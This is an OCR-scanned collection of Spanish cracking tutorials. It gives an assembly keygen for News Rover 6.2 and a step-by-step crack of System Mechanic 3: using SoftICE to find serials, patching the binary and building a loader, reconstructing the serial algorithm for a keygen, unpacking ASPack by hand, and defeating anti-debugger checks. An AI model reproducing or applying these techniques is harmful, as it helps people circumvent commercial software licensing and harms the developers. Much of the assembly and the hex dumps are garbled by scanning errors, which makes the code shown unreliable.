sinnombre db "¡Falta el nombre!",0 

txt1l db "En el programa News Rover hay incluida una ""lista negra"" de 
"crackers y de textos que puedan ser empleados como tanteo (por 
"ejemplo: ""qwerty"" ""xxx"" y un monton más) .",13,10,13,10,3M 
"Esto puede ocasionar que este keygen no funcione y que sea ",X 
"necesario intentarlo con un texto alternativo.",13,10,13,10,1X 


"O a lo peor, es 


"Saludos de CaoS ReptantE 


txt2 db "Importante",0 


el keygen que no anda 


:0(",13,10,13,10,1 


"0 


32 


array db 32, 32, 32, 32, 
arrál db 32. 32, 322 320 
16 
arra3 
16 
arral 
1 
arra5 
arra6 
hInstance dd O 
hIcon da O 

hWnd dd 0 

numero db 12 dup 


32% 
32, 


32, 
327 


32, 
32, 


32, 
32% 


320 
32, 


40, 
32, 


40, 
32% 


40, 
104, 


40, 
16, 


40, 
16, 


32, 
1-6, 


32, 


db 16, 16, 16, 16, 16, 132, 132, 132, 


db 16, 16, 16, 
16, 


2, 


16, 
DIAL 


16, 
2, 


130, 
Lin Li 


130, 
16, 


130, 


Za 16, 16, 


(0),0 


. code 

start: 

invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, addr DlgFunc, NULL 
invoke ExitProcess,NULL 


DlgFunc proc hD1g:DWORD, uUMsg:DWORD, wParam:DWORD, 1lParam: DWORD 
.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,addr Icono 
mov hlIcon,eax 
invoke SendMessage, 


hDl1g, WM_SETICON, 1,hIcon 


16, 


130, 


invoke SetDlglItemText,hDlg,IDC_NAME,ADDR minombre 
.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 
invoke SendMessage,hDlg,WM_CLOSE, 0,0 
.elseif ax==IDC_INFO 
invoke MessageBox,hDlg,ADDR txt1,ADDR txt2,MB_ICONINFORMATION 
.elseif ax==IDC_GEN 
invoke GetDlgltemText,hDlg, IDC_NAME,ADDR nombre, 80 
invoke lstrlen,ADDR nombre 
mov edx,offset largo 
mov dword ptr [edx],eax 
invoke Operacion 
.1f eax== 
invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nada 
invoke SetDlgItemText,hDl1lg,IDC_SERIAL,ADDR sinnombre 
.else 
invoke SetDlgltemText,hDl1g,IDC_SERIAL,ADDR serial 
invoke SetDlgltemText,hDlg, IDC_NAME,ADDR nombre 


.endif 
FEE 
.endif 
.endif 
.endif 


ret 
DlgFunc endp 


Operacion proc 
xXOor ecx,ecx 
mov esi, offset numero 
mov edi,offset nombre 
mov edx, offset array 
invoke lstrlen, offset nombre 
.1f eax < 1 
mov eax,1l 
ret 
.endif 
bucle: xor ebx,ebx 
mov bl,byte ptr[edi] 
.1f ebx== 
jmp siguiente 
.endif 
.1f ebx<80h 
mov al,byte ptr [edx+ebx] 
.else 
xor eax,eax 
.endif 
and eax,107h 
.1f eax== 
jmp pasar 
.endif 
.1f ebx<6lh 
Jjmp seguir 
.endif 
.1f ebx>7Ah 
jmp seguir 
.endif 
add ebx, OFFEOh 
seguir: xor ebx,ecx 
add ebx, dword ptr [esi] 
mov dword ptr [esil],ebx 
inc ecx 
pasar: inc edi 
jmp bucle 


siguiente: mov byte ptr[esi+2],0D3h 


xor 
xor 
mov 
mov 
and 
shr 
xor 
mov 
and 
xor 
mov 
shr 
xor 
xor 
xor 
shl 
mov 
mov 
xor 
mov 
mov 
xor 
mov 
mov 
xor 
mov 
mov 
xor 
mov 
mov 
shl 
mov 
mov 
mov 


ebx, ebx 

ecx, ecx 

b1, byte ptrl[lesi] 
cl,bl 

ebx, 0Fh 

ecx, 4 

ebx, ecx 

cl, byte ptr[esi+1] 
ecx, 0Fh 

ebx, ecx 

cl, byte ptr[esi+1] 
ecx, 4 

ebx, ecx 

ebx, 0Dh 

ebx, 3 

ebx, 4 

byte ptr[esi+3],b1 
bl, byte ptrlesi] 
bl, 98h 
byte ptr[esi+5],b1l 
bl, byte ptr[esi+1] 
b1, 17h 
byte ptr[esi+10],b1 
bl, byte ptr[esi+2] 
bl, 76h 
byte ptr[esi+9],b1 
bl, byte ptr[esi+3] 
b1, 51h 
byte ptr[esi+6],b1l 
ebx,dword ptr [esi+4] 
ebx, 2 

dword ptr [esi],ebx 
bl,byte ptr [esi] 
cl,byte ptr [esi+2] 


or bl,cel 


mov 
mov 
mov 


byte ptr [esi+2],b1 
bl,byte ptr [esi+1] 
cl,byte ptr [esi+3] 


or bl,el 


mov 
mov 
mov 
add 
mov 
shl 
mov 
mov 
mov 


byte ptr [esi+1],b1 
byte ptr [esi],0 
byte ptr [esi+3],0 
esi,4 

ebx,dword ptr [esi+4] 
ebx, 1 

dword ptr [esi],ebx 
bl,byte ptr [esi] 
cl,byte ptr [esi+2] 


or blsecl 


mov 
mov 
mov 


byte ptr [esi+2],b1 
bl,byte ptr [esi+1] 
cl,byte ptr [esi+3] 


or bl,cl 


mov 
mov 
mov 
add 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
mov 


mov 


byte ptr [esi+1],b1 
byte ptr [esi],0 
byte ptr [esi+3],0 
esi,4 
bl,byte ptr [esi-7] 
byte ptr [esi+3],b1 
bl,byte ptr [esi-6 
byte ptr [esi+2],b1 
bl,byte ptr [esi-3] 
byte ptr [esi+1],b1 
bl,byte ptr [esi-2 
byte ptr [esi],bl 


edx,dword ptr [esi 


mov dword ptr [esi],0 
mov dword ptr [esi-4],0 
mov dword ptr [esi-8],0 


mov esi, offset serial 
xor eax,eax 
espacios: mov byte ptr[lesi],32 
.«1f eax < 11 
inc eax 
inc esi 
jmp espacios 
.endif 
dec esi 
mov eax, edx 
mov ecx,10 
otro: cmp eax,ecx 
jb fin 
xor edx,edx 
div ecx 
vr dl, 306 
mov byte ptr[esi],dl 
dec esi 
jmp otro 
fin: or al,30h 
mov byte ptr[esi],al 
xor eax,eax 
ret 


Operacion endp 


end start 


Supongo que sería necesario detallar más el programa, pero esto está resultando demasiado largo, así que si queréis 
alguna aclaración, me podéis dar un toque :0) 


El procedimiento DlgFunc es la base del programa y se ocupa de: 

1”- Condiciones iniciales (WM_INITDIALOO:;: define el icono del programa y pone un nombre ("CaoS ReptantE”) 
por defecto. 

2”- Comprueba si se ha cerrado el programa desde la barra superior (WM_CLOSE) 

3”- Comprueba si se ha pulsado un botón (WM_COMMAND - BN_CLICKED). Si ha sido el de Terminar 
(IDC_EXIT), pues eso, sale. Si ha sido el de info, muestra la ventana de información. Y si ha sido el de Generar ( 
IDC_GEN), comprueba la longitud del nombre, y ejecuta el procedimiento Operacion. Al terminar éste, si la 
longitud del nombre es igual o superior a uno, nos escribe el serial correspondiente al nombre. 


El procedimiento Operacion calcula el número válido, se ocupa de poner espacios en la casilla del serial number 
(para borrar un número que hubiéramos obtenido anteriormente, ya que si fuera más largo, el número resultante sería 
la superposición de ambos) y pasa el serial number obtenido, de hexadecimal a decimal, tras lo cual, vuelve al 
procedimiento principal. Una cosa que hay que hacer notar es que, aunque el programa lo acepta igual, el formato 
del número debe ser XXXX-XXXX-XX, eso es una modificación que se puede hacer al programa y que tampoco es 
nada del otro jueves. 


De hecho, si hacéis los dos archivos como los he hecho yo, y los compiláis, veréis que el programa resultante 
funciona correctamente. Pero como la programación en assembler no es lo mío, estoy seguro de que alguien que 
sepa programar verá muchos defectos, que le agradecería me hiciera saber. 


Como ya hice en mi tuto sobre Teleport, debo mencionar mi deuda con JoTaKe por haberme basado en sus trabajos, 
que podéis encontrar en la Compilación de Tutoriales 2000 v.4.0. 


Ahora que está hecho, vamos a probar si funciona. 


A News Rover 6.2 rev. 3 A ES 
Nombre | CaoS ReptantE 


Serial | 243550761 
Exit | Info | 


Introducimos el número obtenido y... 


Registration successful 


News Rover is now registered for your use. 
You are licensed for the password protection option. 


You are licensed for the handheld device (Palm) option. 


Premio. Pero también había otros premios: 


Registration successful Registration successful 
News Rover is now registered for your use. News Rover is now registered for your use. 
You are licensed for the handheld device (Palm) option. You are licensed for the password protection option. 


Registration successful 


News Rover is now registered for your use 


Antes de despedirme, os recordaré una vez más que si decidís utilizar regularmente el programa, debéis pagar por él, 
para premiar al programador por los buenos ratos que nos ha proporcionado :0) 


Os recuerdo que mi e-mail es: caos_reptante (2hotmail.com 


Por último, quiero mandar un saludo muy cordial a DeK_OiN, saludar también a Act MagO y a Karpoff, desear 
suerte a Mharselo y a Arnau, y por supuesto saludaros a todos los que hayáis llegado hasta aquí. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


KuaTo_ThoR 


INTRODUCCION 


Muy buenas a todos, nuevamente aqui tras un largo descanso sin escribir nada, hasta que he visto este 
programa, con el que pasaremos un buen rato, encontraremos facilmente un número de serie (en realidad 
tres), jugaremos un poco con el programa, lo analizaremos para hacer un keygen (yo lo voy a escribir en 
Pascal, asi que quien quiera probarlo, tendrá que tener un compilador de pascal.) y mucho más. En un 
principo, no pensaba hacer tantas cosas, pero Raziel me convencio para que analizase a fondo la protección 
del programa, y eso es lo que vamos a hacer. Por eso el tuto va a ser un poco largo, pero creo que va a 
merecer la pena. 


El programa está bastante currado, y es una magnifica aplicación de tipo limpiar la mierda' acumulada en 
windows, que como todos sabemos se crea fácilmente. Además nos ayudará a optimizar nuestra conexión y el 
sistema en general. Si os gusta y os resulta útil, ya sabéis que tenéis que hacer. $$ 


Por cierto, en la ayuda podremos ver que el programa tiene tres tipos de registro, Estandar, Profesional e 
Industrial. El totalmente funcional es el registro Industrial. 


AL ATAKE 


Los Números de Serie 


Lo primero de todo, cargamos Sice. Una vez cargado, arrancamos nuestro programa, y... ¡¡¡ Sorpresa !!! se reinicia nuestro PC, 
mmm... ¿qué habrá pasado? pués que el programa tiene una bonita protección antisice, ¡¡ muy original !!, nunca lo había visto. 
Pués nada, volvemos a cargar Sice, y antes de volver a arrancar el programa, cargamos icedump o frogice, o si queréis podéis 
intentar sortear la protección manualmente, eso al gusto del consumidor ;) (al final veremos una forma de saltarnos la 
protección, a mano) 


Ahora sí, el programa arranca sin problema alguno. vemos que hay una opción para meter nuestro nombre y nuestro serial, asi 
que metemos lo que queramos y probamos suerte... vaya por Dios, no hemos tenido suerte, mensaje de error: 


EN) ” 


O License System Mechanic 3 


System Mechanic El 


al 


You have entered an invalid User ID or Serial Number. 
For assistance please contact your software vendor. 


Ok, nada del otro mundo, vamos a Softice (Ctrl+D), y metemos unos cuantos bpx, para no andarnos por las ramas, los más 
usuales, bpx GetWindowTexta, bpx GetDlgitemTexta, bpx GetDlgitemInt. Salimos de Sice (FS) y pulsamos OK. Salta sice, ha 
sido Getwindowtexta, suponemos que en la primera lee el nombre, como es nombre y n” de serie, pulsamos FS una vez más, 
para que lea el n* de serie. Vuelve a saltar sice, ya podemos quitar el breakpoint (bc*). Ahora pulsamos F12 hasta que aparezca 
el nombre de nuestro programa en la linea verde que aparece en Softice. Aparece Sysmechanic tras pulsar una vez F12, para 
ahorrar tiempo pulsamos una vez más F12, y volvemos a aparecer en el programa, en una zona bastante curiosa: 


D15F:OOS5O0O0CCB  C3 

015F:00500Ccc  BS900D5000 EAX, DOSDOD90 
015F:00500CD1 EFFFFFF 00500COo4 
015F:00500CD6 54C0 

D15F:00500CDS OFSS J¡ODODO 

D15F : OOSOOCDE 140D5000 

015F : OOSOOCES3S s1CFFFFFF 

D15F:O0500CES  54C€C0 

D1SF:OOS5SDOCEA OFSS 


Si pasamos este mov (con F10) e introducimos d eax en sice, nos aparecerá lo siguiente en la ventana de datos: 


0167 94 4D 20 53 79 73-00 DO FF DAMN 
0167 06 00 00 00 52 21 53 43-27 53 00 00 FF ....RIS 


0167 035 00 00 00 70 63 79 73-6 ; 7239 OO 00 00 00 ... +] POysmkey.... 


0167 FF FF 

0167:00500DDO 73 8 65 72 00 00 00 0O0-FF 

0167:00500DEO 44 75 65 9 73 74 O0-FF 

0167:00500DFO 21 

0167:00500E00 OB 

0167:00500E10 

0167: 00500E20 

0167:00500E30 6 JB 6 22 DO 00 00 O0-FF 

0167:00500E40 4B € 79 67 72-61 
FF 06 00 DO-2D 


Vaya, vaya, ahora ¿qué coño es esto? . Pues bien. a mi entender, lo que está haciendo es mirar si existe algún programa 
ejecutandose cuyo nombre contenga a estas palabras, podéis probar, solo hay que cambiar el nombre a cualquier aplicación 
poniendo por ejemplo de nombre 'DAMN Sys' y podréis comprobar como vuestro PC se reinicia automaticamente, estos tios 
cada vez me gustan más, jejeje. Continuemos con lo nuestro... seguimos trazando con F10, pasando todas estas comparaciones, 
sin saltar en ninguna de ellas, hasta que salimos del call. (cuando pasamos por el Ret). 


Continuamos atentamente con Fl0, fijandonos en los valores de los registros (si no los véis F2). Hasta que al pasar por 
004900AC vemos que al poner d eax aparece en la ventana de datos nuestro nombre, ahora estamos cerca, hay que tener 
mucho cuidado al pasar por encima de las call's. Justo al pasar por la siguiente llamada, vemos que en la ventana de datos justo 
debajo de nuestro nombre, aparece un extraño número, y justo bajo de ese extraño número, aparece uno aún más extraño, del 
tipo xxxxx-STxxx-XXXXXXXXXx, realmente extraño ;-) creo que está bastante claro lo que es. Después de tantas precauciones, y 
nos brindan el número en bandeja, mmm... Podemos fijarnos en que poco después de esta llamada, hay otra seguida de una 
comparación, este podría ser el esquema: 


D15F:004900B7 ó DODO4FE97C€ 
D15F:0049005EC 5B45F85 EAX, [EBP-08] 
D15F:004900EF S5B55FC EDX, [EBP-04] 
D15F 3 00403F14 


D15F:004900€C”7? 7505 0O04900CE 


D15F :004900C9 ES 


Como vemos, si la flag cero está activada al salir de la llamada, no probocaremos el salto y esi=1, entonces utilizando nuestra 
intuición (no hace falta esforzarse mucho) nos damos cuenta que esto quiere decir registrado Estandar, si miramos más abajo, 
vemos que el esquema se repite dos veces más, salvo que pone esi=2 y esi=3. Como podemos ver ha sido demasiado fácil 
extraer los códigos. Asi que he decidido hacer algo más divertido :-) 


Jugando con el Código 


OK, manos a la obra. Lo que vamos a hacer, es parchear el programa de forma que él mismo nos de el código. ¿Cómo?, sólo 
hay que cambiar el mensaje de error por el número de serie correcto. Para hacer esto, lo primero que debemos saber es dónde 
aparece la ventana. Trazando con F10 donde lo dejamos antes, podremos ver rápidamente en que dirección nos aparece, 
concretamente al pasar por 490184 aparece la ventana de error. Ponemos un bpx en esa dirección y volvemos a introducir los 
datos, salta sice, y nos metemos dentro del call con F8, y vemos algo interesante: 


015F:0045F7?E4 BSFor”74500 EAX, 0045F7FS 
015F:0046F7E9 ESSE28FBFF 00442040 


D15F :0045F7?EE 


Movemos a eax la dirección 48F7F8, y si pasamos por encima de la llamada, veremos que aparece la ventana. Pero primero 
veamos que hay en esa direccion de memoria: 


0167:0045F?FS 59 6 75 20 658 6 76 65-20 65 6 , 65 72 65 6 You 


0167:0045F508 20 6 SE 20 69 6 16 6 60 69 64 ¿0D 33 73 63 Te an invalid User” 


¡ Justo lo que buscábamos ! esta es la frase que queremos cambiar. Ahora sólamente necesitamos saber donde está nuestro 
¡ 
serial correcto; pero, no aparece por ninguno de los registros, vamos a tener que trabajar un poco más de la cuenta. 


Bien, lo que vamos a hacer es que nos muestre el serial para la versión industrial. Para ello, nuevamente metemos los datos, y 
trazamos con F10 hasta llegar a la llamada donde saca el serial industrial., que está en 490117: 


015F:0049011€ [EBP-08] 
015F:0049011F EDX, [EBP-04] 
015F:00490122 a7D3 ? C 00403F214 


O15F :00490127 505 0049012E 


O15F : 00490129 


Nota: Los bytes de las instrucciones asm que metamos, apuntadlos en un papelito. 


Ok, al pasar tras el mov eax, [ebp-08], si ponemos d eax, veremos que aparece en la ventana de datos el serial industrial para 
nuestro nombre. Lo que vamos a hacer es meter esa información en otro registro, concretamente en esi. ¿Por qué esi? pues 
porque es el que he probado y he visto que llega practicamente intacto hasta el mensaje de error, el programa no lo utiliza para 
meter nada en él. Por tanto nos situamos en Sice, tal como está en la imagen, sobre 49011F, y nos disponemos a introducir una 
instrucción en asm, metemos 'a eip', y metemos la instrucción 'mov esi, eax' pulsamos enter, y como vemos que sólo ocupa dos 
bytes, metemos un 'nop' (ya que la instrucción original tenía tres bytes 8B535FC) y pulsadmos enter dos veces más. No sé si lo 
habré explicado muy bien, cualquier duda que tengáis preguntádmela. 


La primera parte ya está hecha, ahora vamos donde lo habíamos dejado antes, en 48F7E4, y miramos el registro esi (d esi), y 
vemos que ahí está nuestro serial industrial, aunque un poco movido a la derecha, concretamente 5 espacios para comprobarlo 
escribimos d esi+5, y veremos que se coloca perfectamente. Ahora sólo tenemos que pasar lo que está en esi a eax, para ello, 
nuevamente tenemos que escribir un poco de asm, 'a eip', y metemos 'lea eax, [esi+5]', que ocupa tres bytes, como la original 
ocupaba cinco, B8F8F74800, tenemos que meter un par de nops para rellenar. ('nop' enter, 'nop' dos veces enter). Pulsamos FS 
y... aparece el serial en la ventana!!!! Ahora estaréis pensando en hacer estos cambios permanentes en el archivo original, pero 
no, porque está empakado con aspack, y aunque con Unaspack, lo tendríamos rapidamente, mejor vamos a hacer un loader, y 
nos evitamos rollos. Voy a utilizar Princess Sandy, aunque cualquier otro servirá. 


Por fin, estamos terminando esta parte, para hacer un loader, lo que necesitamos saber es la dirección de memoria donde lo 
queremos aplicar, los bytes originales de la instrucción a reemplazar y los bytes de la nueva instrucción que queremos 
introducir en su lugar, resumiendo, abrimos "Princess Sandy" y cargamos 'SysMechanic.exe', ahora por cada instrucción que 
queramos introducir pulsamos 'add item', y rellenamos los campos: (las direcciones con todos los ceros correspondientes) 
Adress: 0049011F; Original Data: 8B55FC; Patch Data: 8BFO09O . 

Adress: 0048F7E4; Original Data: B8F8F74800; Patch Data: XXXXXXXXXX . Este os lo dejo a vosotros ;) 


Pulsamos 'Build' y ya está nuestro Loader !!! Sólo queda probarlo. Esto podríamos llamarlo 'Keygen cutre para el registro 
industrial' ;-) 


El generador de Claves 


Lo más dificil a la hora de hacer un Keygen suele ser localizar el lugar o lugares donde es creado nuestro serial correcto, ¡¡ y 
nosotros ya lo hemos hecho!!! ;-) 


Las explicaciones que voy a poner corresponden a el número de registro para la versión Estandar, aunque los tres se crean 
exactamente igual, de hecho todos se crean en la misma dirección, 4FE97C, unicamente cambia lo que podríamos llamar "la 
semilla", que para cada uno de ellos es diferente. Por tanto, nos dirigimos a la call que nos mostró el serial estandar correcto: 
4900B7. (ponemos un bpx aqui) 


Ok, ponemos el breakpoint (bpx 4900B7) metemos los datos de registro (ponemos un nombre de 12 dígitos, para ir todos 
iguales), pulsamos ok, y salta Sice en la llamada, nos metemos dentro de ella con F8, aparecemos en 4FE97C, trazamos un 
poco con F10 y vemos las primeras comparaciones: 


D15F:004FE9AF S837DFS01 DWORD PTR [EBP-08],01 
OD4FE9EB3 "505 DO4FE9BA 
DO4FE9B5S OODODO OOOODDO 
OO4FE9BA 53 DWORD PTR [EBP-085] ,02 
DO4FE9BE OD4FE9C5 
DO4FE9CO OODODO OOOODO 
DO4FE9CS 837DF803 DWORD PTR [EBP-085] ,03 
OD4FE9C9 "505 DO4FE9DO 
OO4FES9CE  BFOCOOODOO  -=. MOY  ——»''EDI,ODO0DODOC 
OO4FESDO 537?DFS0O5 DWORD PTR [(EBP-05],05 
0D04FE9D4 ¿505 OO4FES9DE 


OO4FE9D6 EF129D00000 -»-»=»._ MOY —'”''>EDI,000000 


OO4FE9SDE  EEZ1000000 — MN ———— EBX,000000 4 


Como podemos ver, lo único que se saca de estas comparaciones es el valor de EDI, que puede ser 11h, 17h, OCh ó 19h (todos 
en hexadecimal por supuesto, para no liarnos, pondré una h detrás de cada número en hexadecimal), ya que EBX será 21h en 
todo caso. Pues bien, aqui es donde selecciona esa 'semilla' que os dije, dependiendo del tipo de registro que vayamos a hacer. 
En este caso como hemos entrado en el momento que crea el de la edición estandar, vemos que EDI toma el valor es 11h. Esta 
es la única diferencia en la creación de los distintos tipos de registro, lo cuál nos quitará mucho trabajo a la hora de hacer el 
keygen. Bien, ya tenemos los primeros datos para el keygen, continuemos con F10. Hasta que poco después vemos que antes 
de una llamada, nuestro nombre se ha movido a eax, en 4FE9F8: 


D15F:004FE9FS 5B45FC EAX, [EBP-04] 
O15F:004FESFB ES9454FOFF CA 00403E94 
015F:004FEAOO S53FS0A EAX, OA 
D15F:004FEA03 DOO4FE9E2 


Pasamos por encima de la llamada, y vemos que el registro eax ha tomado el valor OCh que en decimal es 12, es decir calcula 
la longitud de nuestro nombre y la compara con Ah, que es 10 en decimal, y si es inferior saltamos más atrás, creando un bucle 
hasta que el nombre tome longitud 10. Como nosotros hemos metido un nombre de 12 caracteres, seguimos hacia delante, 
justo en la siguiente llamada, nuestro nombre es pasado a mayúsculas, continuamos hasta que llegamos a 4FEA29 que es 
donde comienza la creación del serial: 


:004FEA29 BBO1000000 mov ebx, 00000001 <- EBX=1. EDI=11. ECX=1. ESI= longitud del 
nombre 


:004FEA2E 8B45FC mov eax, dword ptr [ebp-04] <- EAX tiene nuestro nombre (d eax) 
:004FEA31 8A4418FF mov al, byte ptr [eaxtebx-01] <- al un Caracter del nombre 
(por orden) 

:004FEA35 3C46 cmp al, 46 <- Lo compara con 46h = 70 decimal= 'F' 

:004FEA37 7622 jbe 004FEA5B <- si el caracter es mayor o igual que 'F' salta 


:004FEA39 8B45FC mov eax, dword ptr [ebp-04] 


:004FEA3C 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <- eax = caracter del nombre 
seleccionado 

:004FEA41 8D143B lea edx, dword ptr [ebx+edil] <- edx ebx + edi 

:004FEA44 2BC2 sub eax, edx <- eax eax edx 

:004FEA46 8D55DE8 lea edx, dword ptr [ebp-18] 

:004FEA49 E85A9AFOFF call 004084A8 <- ecx = eax. Calculamos el valor decimal del 
caracter 

:004FEA4ZE 8B55DE8 mov edx, dword ptr [ebp-18] <- edx valor decimal del 
Caracter seleccionado 

:004FEA51 8D45F0 lea eax, dword ptr [ebp-10] 

:004FEA54 E84354F0FF call 00403E9C <- Colocamos edx en su sitio, para formar 

el numero de registro 

:O004FEA59 EB20 jmp 004FEA7B <- Saltamos para preparar la siguiente vuelta 
:004FEAS5B 8B45FC mov eax, dword ptr [ebp-04] 

:004FEA5E 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <- eax = caracter del nombre 
seleccionado 

:004FEA63 8D143B lea edx, dword ptr [ebx+edil] <- edx = ebx + edi 

:004FEAG6 03C2 add eax, edx <- eax = eax + edx 

:004FEA68 8D55E8 lea edx, dword ptr [ebp-18] 

:O004FEAGB E8389AF0FF call 004084A8 <- ecx = eax. Calculamos el valor decimal del 
caracter 

:004FEA7O 8B55E8 mov edx, dword ptr [ebp-18] <- edx valor decimal del 
Caracter seleccionado 

:004FEA73 8D45F0 lea eax, dword ptr [ebp-10] 

:O004FEA76 E82154F0FF call 00403E9C <- Colocamos edx en su sitio, para formar 

el numero de registro 

:O004FEA7B 47 inc edi <- edi edi+1 

:O004FEA7C 43 inc ebx <- ebx ebx+1 

:004FEA7D 4E dec esi <- esi esi-1 

:O04FEATE 75AE jne 004FEA2E <- Volvemos a repetir el proceso hasta que esi=0. 


Si hemos introducido un nombre de menos de 10 caracteres, como os dije antes, el programa nos añade al nombre sus propios 
caracteres hasta que tenga 10, estos caracteres son siempre iguales comienza a añadirlos a partir del caracter 21h, 33 decimal, 
que es '! y va añadiendo los caracteres que siguen a este hasta completar el nombre. Por ejemplo si introducimos la letra 'a' 
como nuestro nombre, el nombre resultante será: ' a!"$%k8() '. Este es el número máximo de caracteres que añade, ya que si 
no ponemos nombre, no vale. Un ejemplo más, si metemos de nombre 'pedro' quedará 'pedro!"++$%'. Espero haberlo dejado 
claro. 


Bueno, con todo esto sólo hemos obtenido un número, pero el serial no es de esta forma, el serial es de la forma 12345-ST123- 
1234567890. Pero es muy fácil saber a simple vista como lo coloca. Lo veremos con un ejemplo: supongamos que el número 
obtenido es 838689929598414039383736 el serial sería 83868-ST841-6373839304. La primera parte del serial corresponde a 
los cinco primeros dígitos del número. La última parte del serial corresponde a los diez últimos dígitos del número, pero 
tomados desde el final. Por último, los números de la parte central del serial corresponden a los tres dígitos que están en el 
centro del serial, no hay más que calcular la mitad del número (divisiones sin decimales por supuesto) y coger los tres digitos 
que ahí estén. En este ejemplo, el número tiene 24 dígitos, si hacemos 24 div 2=12, vamos al dígito 12 y lo seleccionamos 
junto a los dos siguientes dígitos, que precisamente son 841. 


En resumen, lo que tenemos que tener en cuenta a la hora de programar nuestro keygen es: 
1.- Lo primero la longitud de nuestro nombre, y si faltan caracteres añadir los que falten. 
2.- Pasamos nuestro nombre a mayúsculas. 


3.- Los registros comienzan con los siguientes valores: EBX=1; ECX= 1; ESI= longitud del nombre ( en hexa); EDI= 11h (a 
'semilla”); 


4.- Seleccionamos un caracter del nombre (por orden por supuesto) y lo comparamos con 'F' si es mayor igual saltaremos si no 
continuaremos sin saltar. La única diferencia radica en que si es mayor que 'F', a eax se le suma edx y si es menor se le resta. 


5.- Pasamos a eax el valor del caracter seleccionado de nuestro nombre, edx=ebx+edi. A eax se le suma o se le resta edx según 
corresponda. 


6.-El valor de eax resutante, será un número, en hexadecimal, lo tenemos que convertir a decimal, y meterlo en una especie de 
cadena, para formar el número final correspndiente a nuestro número. 


7.- Una vez obtenido el número, lo reordenamos hasta formar el serial. 


Bueno, como veis ha sido muy fácil, sólo nos queda programarlo aqui tenéis el que yo he hecho en pascal en el archivo 
sysmecky.pas. Recordad que no debemos poner nombres al programa como keygen o cosas así, o si no reiniciará la 


computadora. :-) 


Cualquier duda que tengáis sobre el programa o cualquier cosa que no haya dejado clara, sólo tenéis que preguntarlo. 


Volcado del Programa 


Lo primero, analizamos el programa con File InsPEctor, o un programa similar, y nos dice que el programa está empaquetado 
con Aspack. Podemos hacer varias cosas, la más rápida y sencila es utilizar Unaspack, y veremos que nos da un bonito y 
perfecto ejecutable :-) Pero como a nosotros nos gusta trabajar más que a nadie :-P, vamos a volcar el programa a mano. 


Lo primero a la hora de volcar un programa es encontrar el Original Entry Point (OEP), el punto original de entrada, para esto 
vamos a utilizar un sencillo y eficaz método de Raziel que podemos encontrar en el Dark Project. Es muy sencillo, vamos a 
Softice, y metemos un breakpoint a GetProcAddress, bpx getprocaddress, salimos de sice, y arrancamos el programa, saltará 
sice, habrá que ir pulsando FS y F12 hasta que veamos que aparece en la linea verde SysMechanic!.aspack, las veces que habrá 
que pulsar FS varía según el sistema, por eso no concreto más. Ahora nos desplazamos para abajo (con las flechas de 
desplazamieto), sobre la ventana de código para buscar una instrucción, en concreto un Push 00000000 ... miramos, ....y un 
poco más abajo lo vemos y ponemos un breakpoint en esa dirección: 


D15F:005F44FB 220000 , oODoOCc 


D15F :005F4503 


Una vez puesto el breakpoint, pulsamos FS... salta sice en esa dirección, pero ahora en lugar de aparecer Push 00000000 pone 
Push 0050F104 y justo después aparece un RET. EL 50F104 es nuestro OEP, y al pasar el Ret, vamos justo a él, por tanto el 
programa ya está descomprimido, sólo nos queda volcarlo a nuestro disco duro. Para ello, nos situamos sobre el Ret, y 
escribimos en sice: 'a eip', e introducimos la instrucción: '¡mp eip' pulsamos un par de veces enter, y FS, para crear un bucle, 
dejando el programa desempaquetado en la memoria, listo para que lo volquemos al disco duro. Para ello, abrimos Procdump, 
y en la lista de tareas, seleccionamos Sysmechanic.exe con el botón secundario del ratón, y pulsamos 'Dump (full) en el menú 
emergente, nos pide un nombre para el archivo, le metemos por ejemplo sys_dump.exe, y lo guardamos en la carpeta del 
programa original. Para cerrar la aplicación que dejamos con el bucle infinito, seleccionamos 'Kill Task", en el mismo menú de 
antes. 


Sin cerrar Procdump, ahora vamos a PE Editor, y abrimos el ejecutable que acabamos de crear, y cambiamos el valor el OEP 
por que hemos encontrado, pero habiéndole restado antes la Image Base, es decir 50F104-400000=10F104=0EP. Ya está 
listo, pero si tenemos pensado abrirlo con Wdasm, nos metemos en 'Sections', y en la primera sección que aparece pulsamos 
con el botón secundario del ratón, seleccionamos 'Edit Section' y cambiamos sus características de CODOO040 a E0000020. 
Ahora sí hemos terminado del todo, probamos el ejecutable, y ¡¡ Funciona !! 


Protección Anti-Sice 


Bueno, para terminar este largo (casi interminable) tutorial, vamos a eliminar la protección anti-sice, simplemente 
frabricaremos un loader, o si queréis podéis hacer un parche para el ejecutable desempaquetado. 


En este programa concreto, hay dos formas de eliminar la protección anti-sice, la directa o la indirecta. ¿Cuál es la indirecta? 
Pués bien, ¿qué hace el programa si encuantra sice? se reinicia nuestra computadora, ¿qué hace el programa si encuentra un 
proceso activo, con el nombre de R!sc's, keygen, etc.? también reinicia, mmm.... jejeje, creo que ya sabéis por donde voy, sólo 
hay que encontrar la llamada que proboca el reinicio y tendríamos localizada la zona en la que el programa busca a softice. 
Pero, como veremos a continuación la forma directa es aún más rápida, aunque por lo que pueda pasar, nunca está de más tener 
más de una ruta de escape ;-) 


Veamos la forma directa. Lo primero es saber qué es lo que estamos buscando, las protecciones más usuales suelen ser 
'Meltlce' y la segunda suele ser una 'int 3' que no funciona con softice, y provoca un error. Lo que parece que hace el programa 
es utilizar Meltlce, ya que no da error por ninguna parte. 


Bien, esta protección es muy fácil de localizar. Vamos a sice (Ctrl+D) y metemos un bpx CreateFileA. Arrancamos el 
programa y rompe sice, FS un par de veces más y F12 para llegar al código de nuestro programa, justo debajo de la llamada a 
la API: 


015F:00500FO1  681C0F5000 

015F :DOSOOFO6 

D15F : DOSOOFOB 

015F : DOSOOFOE 

015F:D0500F10 

D15F:00500F11 EERNEL32 'CloseHandle 


015F:00500F16 330 BL,O1 


